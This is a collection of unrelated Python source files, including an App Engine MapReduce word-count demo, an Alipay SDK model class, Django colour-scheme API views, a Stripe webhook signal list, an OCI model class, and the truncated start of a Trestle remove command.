__author__ = """[email protected] (Mike Aizatsky), [email protected] (Chris
Bunch)"""
# Using opensource naming conventions, pylint: disable=g-bad-name
import datetime
import jinja2
import logging
import re
import urllib
import webapp2
from google.appengine.ext import blobstore
from google.appengine.ext import db
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.api import app_identity
from google.appengine.api import taskqueue
from google.appengine.api import users
from mapreduce import base_handler
from mapreduce import mapreduce_pipeline
from mapreduce import operation as op
from mapreduce import shuffler
class FileMetadata(db.Model):
"""A helper class that will hold metadata for the user's blobs.
Specifially, we want to keep track of who uploaded it, where they uploaded it
from (right now they can only upload from their computer, but in the future
urlfetch would be nice to add), and links to the results of their MR jobs. To
enable our querying to scan over our input data, we store keys in the form
'user/date/blob_key', where 'user' is the given user's e-mail address, 'date'
is the date and time that they uploaded the item on, and 'blob_key'
indicates the location in the Blobstore that the item can be found at. '/'
is not the actual separator between these values - we use '..' since it is
an illegal set of characters for an e-mail address to contain.
"""
__SEP = ".."
__NEXT = "./"
owner = db.UserProperty()
filename = db.StringProperty()
uploadedOn = db.DateTimeProperty()
source = db.StringProperty()
blobkey = db.StringProperty()
wordcount_link = db.StringProperty()
index_link = db.StringProperty()
phrases_link = db.StringProperty()
@staticmethod
def getFirstKeyForUser(username):
"""Helper function that returns the first possible key a user could own.
This is useful for table scanning, in conjunction with getLastKeyForUser.
Args:
username: The given user's e-mail address.
Returns:
The internal key representing the earliest possible key that a user could
own (although the value of this key is not able to be used for actual
user data).
"""
return db.Key.from_path("FileMetadata", username + FileMetadata.__SEP)
@staticmethod
def getLastKeyForUser(username):
"""Helper function that returns the last possible key a user could own.
This is useful for table scanning, in conjunction with getFirstKeyForUser.
Args:
username: The given user's e-mail address.
Returns:
The internal key representing the last possible key that a user could
own (although the value of this key is not able to be used for actual
user data).
"""
return db.Key.from_path("FileMetadata", username + FileMetadata.__NEXT)
@staticmethod
def getKeyName(username, date, blob_key):
"""Returns the internal key for a particular item in the database.
Our items are stored with keys of the form 'user/date/blob_key' ('/' is
not the real separator, but __SEP is).
Args:
username: The given user's e-mail address.
date: A datetime object representing the date and time that an input
file was uploaded to this app.
blob_key: The blob key corresponding to the location of the input file
in the Blobstore.
Returns:
The internal key for the item specified by (username, date, blob_key).
"""
sep = FileMetadata.__SEP
return str(username + sep + str(date) + sep + blob_key)
class IndexHandler(webapp2.RequestHandler):
"""The main page that users will interact with, which presents users with
the ability to upload new data or run MapReduce jobs on their existing data.
"""
template_env = jinja2.Environment(loader=jinja2.FileSystemLoader("templates"),
autoescape=True)
def get(self):
user = users.get_current_user()
username = user.nickname()
first = FileMetadata.getFirstKeyForUser(username)
last = FileMetadata.getLastKeyForUser(username)
q = FileMetadata.all()
q.filter("__key__ >", first)
q.filter("__key__ < ", last)
results = q.fetch(10)
items = [result for result in results]
length = len(items)
bucket_name = app_identity.get_default_gcs_bucket_name()
upload_url = blobstore.create_upload_url("/upload",
gs_bucket_name=bucket_name)
self.response.out.write(self.template_env.get_template("index.html").render(
{"username": username,
"items": items,
"length": length,
"upload_url": upload_url}))
def post(self):
filekey = self.request.get("filekey")
blob_key = self.request.get("blobkey")
if self.request.get("word_count"):
pipeline = WordCountPipeline(filekey, blob_key)
elif self.request.get("index"):
pipeline = IndexPipeline(filekey, blob_key)
else:
pipeline = PhrasesPipeline(filekey, blob_key)
pipeline.start()
self.redirect(pipeline.base_path + "/status?root=" + pipeline.pipeline_id)
def split_into_sentences(s):
"""Split text into list of sentences."""
s = re.sub(r"\s+", " ", s)
s = re.sub(r"[\\.\\?\\!]", "\n", s)
return s.split("\n")
def split_into_words(s):
"""Split a sentence into list of words."""
s = re.sub(r"\W+", " ", s)
s = re.sub(r"[_0-9]+", " ", s)
return s.split()
def word_count_map(data):
"""Word count map function."""
(entry, text_fn) = data
text = text_fn()
logging.debug("Got %s", entry.filename)
for s in split_into_sentences(text):
for w in split_into_words(s.lower()):
yield (w, "")
def word_count_reduce(key, values):
"""Word count reduce function."""
yield "%s: %d\n" % (key, len(values))
def index_map(data):
"""Index demo map function."""
(entry, text_fn) = data
text = text_fn()
logging.debug("Got %s", entry.filename)
for s in split_into_sentences(text):
for w in split_into_words(s.lower()):
yield (w, entry.filename)
def index_reduce(key, values):
"""Index demo reduce function."""
yield "%s: %s\n" % (key, list(set(values)))
PHRASE_LENGTH = 4
def phrases_map(data):
"""Phrases demo map function."""
(entry, text_fn) = data
text = text_fn()
filename = entry.filename
logging.debug("Got %s", filename)
for s in split_into_sentences(text):
words = split_into_words(s.lower())
if len(words) < PHRASE_LENGTH:
yield (":".join(words), filename)
continue
for i in range(0, len(words) - PHRASE_LENGTH):
yield (":".join(words[i:i+PHRASE_LENGTH]), filename)
def phrases_reduce(key, values):
"""Phrases demo reduce function."""
if len(values) < 10:
return
counts = {}
for filename in values:
counts[filename] = counts.get(filename, 0) + 1
words = re.sub(r":", " ", key)
threshold = len(values) / 2
for filename, count in counts.items():
if count > threshold:
yield "%s:%s\n" % (words, filename)
class WordCountPipeline(base_handler.PipelineBase):
"""A pipeline to run Word count demo.
Args:
blobkey: blobkey to process as string. Should be a zip archive with
text files inside.
"""
def run(self, filekey, blobkey):
logging.debug("filename is %s" % filekey)
bucket_name = app_identity.get_default_gcs_bucket_name()
output = yield mapreduce_pipeline.MapreducePipeline(
"word_count",
"main.word_count_map",
"main.word_count_reduce",
"mapreduce.input_readers.BlobstoreZipInputReader",
"mapreduce.output_writers.GoogleCloudStorageOutputWriter",
mapper_params={
"blob_key": blobkey,
},
reducer_params={
"output_writer": {
"bucket_name": bucket_name,
"content_type": "text/plain",
}
},
shards=16)
yield StoreOutput("WordCount", filekey, output)
class IndexPipeline(base_handler.PipelineBase):
"""A pipeline to run Index demo.
Args:
blobkey: blobkey to process as string. Should be a zip archive with
text files inside.
"""
def run(self, filekey, blobkey):
bucket_name = app_identity.get_default_gcs_bucket_name()
output = yield mapreduce_pipeline.MapreducePipeline(
"index",
"main.index_map",
"main.index_reduce",
"mapreduce.input_readers.BlobstoreZipInputReader",
"mapreduce.output_writers.GoogleCloudStorageOutputWriter",
mapper_params={
"blob_key": blobkey,
},
reducer_params={
"output_writer": {
"bucket_name": bucket_name,
"content_type": "text/plain",
}
},
shards=16)
yield StoreOutput("Index", filekey, output)
class PhrasesPipeline(base_handler.PipelineBase):
"""A pipeline to run Phrases demo.
Args:
blobkey: blobkey to process as string. Should be a zip archive with
text files inside.
"""
def run(self, filekey, blobkey):
bucket_name = app_identity.get_default_gcs_bucket_name()
output = yield mapreduce_pipeline.MapreducePipeline(
"phrases",
"main.phrases_map",
"main.phrases_reduce",
"mapreduce.input_readers.BlobstoreZipInputReader",
"mapreduce.output_writers.GoogleCloudStorageOutputWriter",
mapper_params={
"blob_key": blobkey,
},
reducer_params={
"output_writer": {
"bucket_name": bucket_name,
"content_type": "text/plain",
}
},
shards=16)
yield StoreOutput("Phrases", filekey, output)
class StoreOutput(base_handler.PipelineBase):
"""A pipeline to store the result of the MapReduce job in the database.
Args:
mr_type: the type of mapreduce job run (e.g., WordCount, Index)
encoded_key: the DB key corresponding to the metadata of this job
output: the gcs file path where the output of the job is stored
"""
def run(self, mr_type, encoded_key, output):
logging.debug("output is %s" % str(output))
key = db.Key(encoded=encoded_key)
m = FileMetadata.get(key)
blobstore_filename = "/gs" + output[0]
blobstore_gs_key = blobstore.create_gs_key(blobstore_filename)
url_path = "/blobstore/" + blobstore_gs_key
if mr_type == "WordCount":
m.wordcount_link = url_path
elif mr_type == "Index":
m.index_link = url_path
elif mr_type == "Phrases":
m.phrases_link = url_path
m.put()
class UploadHandler(blobstore_handlers.BlobstoreUploadHandler):
"""Handler to upload data to blobstore."""
def post(self):
source = "uploaded by user"
upload_files = self.get_uploads("file")
blob_key = upload_files[0].key()
name = self.request.get("name")
user = users.get_current_user()
username = user.nickname()
date = datetime.datetime.now()
str_blob_key = str(blob_key)
key = FileMetadata.getKeyName(username, date, str_blob_key)
m = FileMetadata(key_name = key)
m.owner = user
m.filename = name
m.uploadedOn = date
m.source = source
m.blobkey = str_blob_key
m.put()
self.redirect("/")
class DownloadHandler(blobstore_handlers.BlobstoreDownloadHandler):
"""Handler to download blob by blobkey."""
def get(self, key):
key = str(urllib.unquote(key)).strip()
logging.debug("key is %s" % key)
blob_info = blobstore.BlobInfo.get(key)
self.send_blob(blob_info)
app = webapp2.WSGIApplication(
[
('/', IndexHandler),
('/upload', UploadHandler),
(r'/blobstore/(.*)', DownloadHandler),
],
debug=True)
|
the-stack_0_19789 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayMarketingCashlessticketTemplateCreateModel(object):
def __init__(self):
self._amount = None
self._brand_name = None
self._extension_info = None
self._group_code = None
self._memo = None
self._notify_uri = None
self._out_biz_no = None
self._publish_end_time = None
self._publish_start_time = None
self._rule_conf = None
self._ticket_available_time = None
self._ticket_description = None
self._ticket_quantity = None
self._ticket_type = None
self._ticket_valid_period = None
self._total_amount = None
@property
def amount(self):
return self._amount
@amount.setter
def amount(self, value):
self._amount = value
@property
def brand_name(self):
return self._brand_name
@brand_name.setter
def brand_name(self, value):
self._brand_name = value
@property
def extension_info(self):
return self._extension_info
@extension_info.setter
def extension_info(self, value):
self._extension_info = value
@property
def group_code(self):
return self._group_code
@group_code.setter
def group_code(self, value):
self._group_code = value
@property
def memo(self):
return self._memo
@memo.setter
def memo(self, value):
self._memo = value
@property
def notify_uri(self):
return self._notify_uri
@notify_uri.setter
def notify_uri(self, value):
self._notify_uri = value
@property
def out_biz_no(self):
return self._out_biz_no
@out_biz_no.setter
def out_biz_no(self, value):
self._out_biz_no = value
@property
def publish_end_time(self):
return self._publish_end_time
@publish_end_time.setter
def publish_end_time(self, value):
self._publish_end_time = value
@property
def publish_start_time(self):
return self._publish_start_time
@publish_start_time.setter
def publish_start_time(self, value):
self._publish_start_time = value
@property
def rule_conf(self):
return self._rule_conf
@rule_conf.setter
def rule_conf(self, value):
self._rule_conf = value
@property
def ticket_available_time(self):
return self._ticket_available_time
@ticket_available_time.setter
def ticket_available_time(self, value):
self._ticket_available_time = value
@property
def ticket_description(self):
return self._ticket_description
@ticket_description.setter
def ticket_description(self, value):
self._ticket_description = value
@property
def ticket_quantity(self):
return self._ticket_quantity
@ticket_quantity.setter
def ticket_quantity(self, value):
self._ticket_quantity = value
@property
def ticket_type(self):
return self._ticket_type
@ticket_type.setter
def ticket_type(self, value):
self._ticket_type = value
@property
def ticket_valid_period(self):
return self._ticket_valid_period
@ticket_valid_period.setter
def ticket_valid_period(self, value):
self._ticket_valid_period = value
@property
def total_amount(self):
return self._total_amount
@total_amount.setter
def total_amount(self, value):
self._total_amount = value
def to_alipay_dict(self):
params = dict()
if self.amount:
if hasattr(self.amount, 'to_alipay_dict'):
params['amount'] = self.amount.to_alipay_dict()
else:
params['amount'] = self.amount
if self.brand_name:
if hasattr(self.brand_name, 'to_alipay_dict'):
params['brand_name'] = self.brand_name.to_alipay_dict()
else:
params['brand_name'] = self.brand_name
if self.extension_info:
if hasattr(self.extension_info, 'to_alipay_dict'):
params['extension_info'] = self.extension_info.to_alipay_dict()
else:
params['extension_info'] = self.extension_info
if self.group_code:
if hasattr(self.group_code, 'to_alipay_dict'):
params['group_code'] = self.group_code.to_alipay_dict()
else:
params['group_code'] = self.group_code
if self.memo:
if hasattr(self.memo, 'to_alipay_dict'):
params['memo'] = self.memo.to_alipay_dict()
else:
params['memo'] = self.memo
if self.notify_uri:
if hasattr(self.notify_uri, 'to_alipay_dict'):
params['notify_uri'] = self.notify_uri.to_alipay_dict()
else:
params['notify_uri'] = self.notify_uri
if self.out_biz_no:
if hasattr(self.out_biz_no, 'to_alipay_dict'):
params['out_biz_no'] = self.out_biz_no.to_alipay_dict()
else:
params['out_biz_no'] = self.out_biz_no
if self.publish_end_time:
if hasattr(self.publish_end_time, 'to_alipay_dict'):
params['publish_end_time'] = self.publish_end_time.to_alipay_dict()
else:
params['publish_end_time'] = self.publish_end_time
if self.publish_start_time:
if hasattr(self.publish_start_time, 'to_alipay_dict'):
params['publish_start_time'] = self.publish_start_time.to_alipay_dict()
else:
params['publish_start_time'] = self.publish_start_time
if self.rule_conf:
if hasattr(self.rule_conf, 'to_alipay_dict'):
params['rule_conf'] = self.rule_conf.to_alipay_dict()
else:
params['rule_conf'] = self.rule_conf
if self.ticket_available_time:
if hasattr(self.ticket_available_time, 'to_alipay_dict'):
params['ticket_available_time'] = self.ticket_available_time.to_alipay_dict()
else:
params['ticket_available_time'] = self.ticket_available_time
if self.ticket_description:
if hasattr(self.ticket_description, 'to_alipay_dict'):
params['ticket_description'] = self.ticket_description.to_alipay_dict()
else:
params['ticket_description'] = self.ticket_description
if self.ticket_quantity:
if hasattr(self.ticket_quantity, 'to_alipay_dict'):
params['ticket_quantity'] = self.ticket_quantity.to_alipay_dict()
else:
params['ticket_quantity'] = self.ticket_quantity
if self.ticket_type:
if hasattr(self.ticket_type, 'to_alipay_dict'):
params['ticket_type'] = self.ticket_type.to_alipay_dict()
else:
params['ticket_type'] = self.ticket_type
if self.ticket_valid_period:
if hasattr(self.ticket_valid_period, 'to_alipay_dict'):
params['ticket_valid_period'] = self.ticket_valid_period.to_alipay_dict()
else:
params['ticket_valid_period'] = self.ticket_valid_period
if self.total_amount:
if hasattr(self.total_amount, 'to_alipay_dict'):
params['total_amount'] = self.total_amount.to_alipay_dict()
else:
params['total_amount'] = self.total_amount
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayMarketingCashlessticketTemplateCreateModel()
if 'amount' in d:
o.amount = d['amount']
if 'brand_name' in d:
o.brand_name = d['brand_name']
if 'extension_info' in d:
o.extension_info = d['extension_info']
if 'group_code' in d:
o.group_code = d['group_code']
if 'memo' in d:
o.memo = d['memo']
if 'notify_uri' in d:
o.notify_uri = d['notify_uri']
if 'out_biz_no' in d:
o.out_biz_no = d['out_biz_no']
if 'publish_end_time' in d:
o.publish_end_time = d['publish_end_time']
if 'publish_start_time' in d:
o.publish_start_time = d['publish_start_time']
if 'rule_conf' in d:
o.rule_conf = d['rule_conf']
if 'ticket_available_time' in d:
o.ticket_available_time = d['ticket_available_time']
if 'ticket_description' in d:
o.ticket_description = d['ticket_description']
if 'ticket_quantity' in d:
o.ticket_quantity = d['ticket_quantity']
if 'ticket_type' in d:
o.ticket_type = d['ticket_type']
if 'ticket_valid_period' in d:
o.ticket_valid_period = d['ticket_valid_period']
if 'total_amount' in d:
o.total_amount = d['total_amount']
return o
|
the-stack_0_19791 | import json
import os
import random
from django.contrib import auth
from django.contrib.admin.views.decorators import staff_member_required
from django.db.models import Count
from django.http import JsonResponse, HttpResponse
from django.views.decorators.http import require_http_methods
from colorish.decorators import json_request, require_login
from main.models import Scheme
from . import generator
@require_http_methods(['GET'])
def me(request):
if request.user.is_authenticated:
return JsonResponse({
'username': request.user.username,
})
else:
return JsonResponse(None, safe=False)
@require_http_methods(['POST'])
@json_request
def login(request):
user = auth.authenticate(username=request.json['username'], password=request.json['password'])
if user is None:
return JsonResponse(False, safe=False)
else:
auth.login(request, user)
return JsonResponse(True, safe=False)
@require_http_methods(['POST'])
@json_request
def generate(request):
user = request.user if request.user.is_authenticated else None
n = generator.get_network(request.json['networkId'])
schemes_count = Scheme.objects.filter(network_id=n['id']).count()
use_cache = random.choices([True, False], weights=[max(0, schemes_count - 1000), 1000])[0]
if use_cache:
i = random.randint(0, schemes_count - 1)
scheme = Scheme.objects.filter(network_id=n['id']).order_by('id')[i]
else:
generated = generator.generate(n)
scheme = Scheme(
view_count=1,
time=generated['time'],
network_id=generated['network_id'],
quality=generated['quality'],
)
scheme.set_colors(generated['colors'])
scheme.save()
return JsonResponse(scheme.as_dict(user=user))
@staff_member_required
@require_http_methods(['GET'])
def bulk_generate(request, network_id):
for i in range(20):
generated = generator.generate(network_id=network_id)
scheme = Scheme(view_count=1, time=generated['time'], network_id=generated['network_id'], quality=generated['quality'], )
scheme.set_colors(generated['colors'])
scheme.save()
return HttpResponse('success')
@require_http_methods(['GET'])
def popular(request, network_id=None):
user = request.user if request.user.is_authenticated else None
schemes = Scheme.objects.annotate(liked_users_count=Count('liked_users')).order_by('-liked_users_count', '-id')
ret = []
if network_id:
schemes = schemes.filter(network_id=network_id)
for scheme in schemes[:9]:
ret.append(scheme.as_dict(user=user))
return JsonResponse(ret, safe=False)
@require_http_methods(['GET'])
def networks(request):
ret = []
for networkId in os.listdir('state-dict'):
ret.append({
'networkId': networkId,
'schemeCount': Scheme.objects.filter(network_id=networkId).count(),
})
return JsonResponse(ret, safe=False)
@require_http_methods(['GET'])
def network(request, network_id):
with open('state-dict/' + network_id + '/log.json') as json_file:
ret = {
'networkId': network_id,
'schemeCount': Scheme.objects.filter(network_id=network_id).count(),
'log': json.load(json_file),
}
return JsonResponse(ret)
@require_http_methods(['GET'])
def scheme_detail(request, scheme_id):
user = request.user if request.user.is_authenticated else None
s = Scheme.objects.get(id=scheme_id)
s.view_count += 1
s.save()
return JsonResponse(s.as_dict(user=user))
@require_login
@require_http_methods(['GET'])
def toggle_like(request, scheme_id):
scheme = Scheme.objects.get(id=scheme_id)
u = request.user
liked = scheme.liked_users.filter(id=u.id).exists()
if liked:
scheme.liked_users.remove(u)
else:
scheme.liked_users.add(u)
return JsonResponse({
'liked_count': scheme.like_count(),
'liked': not liked,
})
@require_login
@require_http_methods(['GET'])
def likes(request):
user = request.user if request.user.is_authenticated else None
ret = [s.as_dict(user) for s in request.user.likes.all()]
return JsonResponse(ret, safe=False)
|
the-stack_0_19792 | """
signals are sent for each event Stripe sends to the app
Stripe docs for Webhooks: https://stripe.com/docs/webhooks
"""
from django.dispatch import Signal
webhook_processing_error = Signal(providing_args=["data", "exception"])
# A signal for each Event type. See https://stripe.com/docs/api/events/types
WEBHOOK_SIGNALS = dict(
[
(hook, Signal(providing_args=["event"]))
for hook in [
# Update this by copy-pasting the "enabled_events" enum values from
# https://raw.githubusercontent.com/stripe/openapi/master/openapi/spec3.json
"account.application.authorized",
"account.application.deauthorized",
"account.external_account.created",
"account.external_account.deleted",
"account.external_account.updated",
"account.updated",
"application_fee.created",
"application_fee.refund.updated",
"application_fee.refunded",
"balance.available",
"capability.updated",
"charge.captured",
"charge.dispute.closed",
"charge.dispute.created",
"charge.dispute.funds_reinstated",
"charge.dispute.funds_withdrawn",
"charge.dispute.updated",
"charge.expired",
"charge.failed",
"charge.pending",
"charge.refund.updated",
"charge.refunded",
"charge.succeeded",
"charge.updated",
"checkout.session.async_payment_failed",
"checkout.session.async_payment_succeeded",
"checkout.session.completed",
"coupon.created",
"coupon.deleted",
"coupon.updated",
"credit_note.created",
"credit_note.updated",
"credit_note.voided",
"customer.created",
"customer.deleted",
"customer.discount.created",
"customer.discount.deleted",
"customer.discount.updated",
"customer.source.created",
"customer.source.deleted",
"customer.source.expiring",
"customer.source.updated",
"customer.subscription.created",
"customer.subscription.deleted",
"customer.subscription.pending_update_applied",
"customer.subscription.pending_update_expired",
"customer.subscription.trial_will_end",
"customer.subscription.updated",
"customer.tax_id.created",
"customer.tax_id.deleted",
"customer.tax_id.updated",
"customer.updated",
"file.created",
"invoice.created",
"invoice.deleted",
"invoice.finalization_failed",
"invoice.finalized",
"invoice.marked_uncollectible",
"invoice.paid",
"invoice.payment_action_required",
"invoice.payment_failed",
"invoice.payment_succeeded",
"invoice.sent",
"invoice.upcoming",
"invoice.updated",
"invoice.voided",
"invoiceitem.created",
"invoiceitem.deleted",
"invoiceitem.updated",
"issuing_authorization.created",
"issuing_authorization.request",
"issuing_authorization.updated",
"issuing_card.created",
"issuing_card.updated",
"issuing_cardholder.created",
"issuing_cardholder.updated",
"issuing_dispute.closed",
"issuing_dispute.created",
"issuing_dispute.funds_reinstated",
"issuing_dispute.submitted",
"issuing_dispute.updated",
"issuing_transaction.created",
"issuing_transaction.updated",
"mandate.updated",
"order.created",
"order.payment_failed",
"order.payment_succeeded",
"order.updated",
"order_return.created",
"payment_intent.amount_capturable_updated",
"payment_intent.canceled",
"payment_intent.created",
"payment_intent.payment_failed",
"payment_intent.processing",
"payment_intent.requires_action",
"payment_intent.succeeded",
"payment_method.attached",
"payment_method.automatically_updated",
"payment_method.detached",
"payment_method.updated",
"payout.canceled",
"payout.created",
"payout.failed",
"payout.paid",
"payout.updated",
"person.created",
"person.deleted",
"person.updated",
"plan.created",
"plan.deleted",
"plan.updated",
"price.created",
"price.deleted",
"price.updated",
"product.created",
"product.deleted",
"product.updated",
"promotion_code.created",
"promotion_code.updated",
"radar.early_fraud_warning.created",
"radar.early_fraud_warning.updated",
"recipient.created",
"recipient.deleted",
"recipient.updated",
"reporting.report_run.failed",
"reporting.report_run.succeeded",
"reporting.report_type.updated",
"review.closed",
"review.opened",
"setup_intent.canceled",
"setup_intent.created",
"setup_intent.requires_action",
"setup_intent.setup_failed",
"setup_intent.succeeded",
"sigma.scheduled_query_run.created",
"sku.created",
"sku.deleted",
"sku.updated",
"source.canceled",
"source.chargeable",
"source.failed",
"source.mandate_notification",
"source.refund_attributes_required",
"source.transaction.created",
"source.transaction.updated",
"subscription_schedule.aborted",
"subscription_schedule.canceled",
"subscription_schedule.completed",
"subscription_schedule.created",
"subscription_schedule.expiring",
"subscription_schedule.released",
"subscription_schedule.updated",
"tax_rate.created",
"tax_rate.updated",
"topup.canceled",
"topup.created",
"topup.failed",
"topup.reversed",
"topup.succeeded",
"transfer.created",
"transfer.failed",
"transfer.paid",
"transfer.reversed",
"transfer.updated",
# deprecated (no longer in events_types list) - TODO can be deleted?
"checkout_beta.session_succeeded",
"issuer_fraud_record.created",
"payment_intent.requires_capture",
"payment_method.card_automatically_updated",
"issuing_dispute.created",
"issuing_dispute.updated",
"issuing_settlement.created",
"issuing_settlement.updated",
# special case? - TODO can be deleted?
"ping",
]
]
)
|
the-stack_0_19793 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateScheduledTaskDetails(object):
"""
The details for updating a schedule task.
"""
#: A constant which can be used with the kind property of a UpdateScheduledTaskDetails.
#: This constant has a value of "ACCELERATION"
KIND_ACCELERATION = "ACCELERATION"
#: A constant which can be used with the kind property of a UpdateScheduledTaskDetails.
#: This constant has a value of "STANDARD"
KIND_STANDARD = "STANDARD"
def __init__(self, **kwargs):
"""
Initializes a new UpdateScheduledTaskDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
to a service operations then you should favor using a subclass over the base class:
* :class:`~oci.log_analytics.models.UpdateStandardTaskDetails`
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param kind:
The value to assign to the kind property of this UpdateScheduledTaskDetails.
Allowed values for this property are: "ACCELERATION", "STANDARD"
:type kind: str
:param display_name:
The value to assign to the display_name property of this UpdateScheduledTaskDetails.
:type display_name: str
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateScheduledTaskDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this UpdateScheduledTaskDetails.
:type defined_tags: dict(str, dict(str, object))
:param schedules:
The value to assign to the schedules property of this UpdateScheduledTaskDetails.
:type schedules: list[oci.log_analytics.models.Schedule]
"""
self.swagger_types = {
'kind': 'str',
'display_name': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'schedules': 'list[Schedule]'
}
self.attribute_map = {
'kind': 'kind',
'display_name': 'displayName',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'schedules': 'schedules'
}
self._kind = None
self._display_name = None
self._freeform_tags = None
self._defined_tags = None
self._schedules = None
@staticmethod
def get_subtype(object_dictionary):
"""
Given the hash representation of a subtype of this class,
use the info in the hash to return the class of the subtype.
"""
type = object_dictionary['kind']
if type == 'STANDARD':
return 'UpdateStandardTaskDetails'
else:
return 'UpdateScheduledTaskDetails'
@property
def kind(self):
"""
**[Required]** Gets the kind of this UpdateScheduledTaskDetails.
Discriminator.
Allowed values for this property are: "ACCELERATION", "STANDARD"
:return: The kind of this UpdateScheduledTaskDetails.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this UpdateScheduledTaskDetails.
Discriminator.
:param kind: The kind of this UpdateScheduledTaskDetails.
:type: str
"""
allowed_values = ["ACCELERATION", "STANDARD"]
if not value_allowed_none_or_none_sentinel(kind, allowed_values):
raise ValueError(
"Invalid value for `kind`, must be None or one of {0}"
.format(allowed_values)
)
self._kind = kind
@property
def display_name(self):
"""
Gets the display_name of this UpdateScheduledTaskDetails.
A user-friendly name that is changeable and that does not have to be unique.
Format: a leading alphanumeric, followed by zero or more
alphanumerics, underscores, spaces, backslashes, or hyphens in any order).
No trailing spaces allowed.
:return: The display_name of this UpdateScheduledTaskDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this UpdateScheduledTaskDetails.
A user-friendly name that is changeable and that does not have to be unique.
Format: a leading alphanumeric, followed by zero or more
alphanumerics, underscores, spaces, backslashes, or hyphens in any order).
No trailing spaces allowed.
:param display_name: The display_name of this UpdateScheduledTaskDetails.
:type: str
"""
self._display_name = display_name
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this UpdateScheduledTaskDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:return: The freeform_tags of this UpdateScheduledTaskDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this UpdateScheduledTaskDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:param freeform_tags: The freeform_tags of this UpdateScheduledTaskDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this UpdateScheduledTaskDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:return: The defined_tags of this UpdateScheduledTaskDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this UpdateScheduledTaskDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:param defined_tags: The defined_tags of this UpdateScheduledTaskDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def schedules(self):
"""
Gets the schedules of this UpdateScheduledTaskDetails.
Schedules may be updated for task types SAVED_SEARCH and PURGE.
Note there may only be a single schedule for SAVED_SEARCH and PURGE scheduled tasks.
:return: The schedules of this UpdateScheduledTaskDetails.
:rtype: list[oci.log_analytics.models.Schedule]
"""
return self._schedules
@schedules.setter
def schedules(self, schedules):
"""
Sets the schedules of this UpdateScheduledTaskDetails.
Schedules may be updated for task types SAVED_SEARCH and PURGE.
Note there may only be a single schedule for SAVED_SEARCH and PURGE scheduled tasks.
:param schedules: The schedules of this UpdateScheduledTaskDetails.
:type: list[oci.log_analytics.models.Schedule]
"""
self._schedules = schedules
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
the-stack_0_19797 | # -*- mode:python; coding:utf-8 -*-
# Copyright (c) 2020 IBM Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Trestle Remove Command."""
import argparse
import logging
import pathlib
import traceback
from typing import List, Tuple
import trestle.common.const as const
import trestle.common.err as err
from trestle.common import log
from trestle.common.err import TrestleError
from trestle.common.model_utils import ModelUtils
from trestle.core.commands.command_docs import CommandPlusDocs
from trestle.core.commands.common.return_codes import CmdReturnCodes
from trestle.core.models.actions import CreatePathAction, RemoveAction, WriteFileAction
from trestle.core.models.elements import Element, ElementPath
from trestle.core.models.file_content_type import FileContentType
from trestle.core.models.plans import Plan
logger = logging.getLogger(__name__)
class RemoveCmd(CommandPlusDocs):
"""Remove a subcomponent to an existing model."""
name = 'remove'
def _init_arguments(self) -> None:
self.add_argument(
f'-{const.ARG_FILE_SHORT}',
f'--{const.ARG_FILE}',
help=const.ARG_DESC_FILE + ' to remove component/subcomponent to.',
required=True
)
self.add_argument(
f'-{const.ARG_ELEMENT_SHORT}',
f'--{const.ARG_ELEMENT}',
help=const.ARG_DESC_ELEMENT + ' to remove.',
required=True
)
def _run(self, args: argparse.Namespace) -> int:
"""Remove an OSCAL component/subcomponent to the specified component.
This method takes input a filename and a list of comma-seperated element path. Element paths are field aliases.
The method first finds the parent model from the file and loads the file into the model.
Then the method executes 'remove' for each of the element paths specified.
"""
try:
log.set_log_level_from_args(args)
args_dict = args.__dict__
file_path = pathlib.Path(args_dict[const.ARG_FILE]).resolve()
try:
relative_path = file_path.relative_to(args.trestle_root)
# Get parent model and then load json into parent model
except Exception:
logger.error(f'{file_path} is not part of the trestle project {args.trestle_root}')
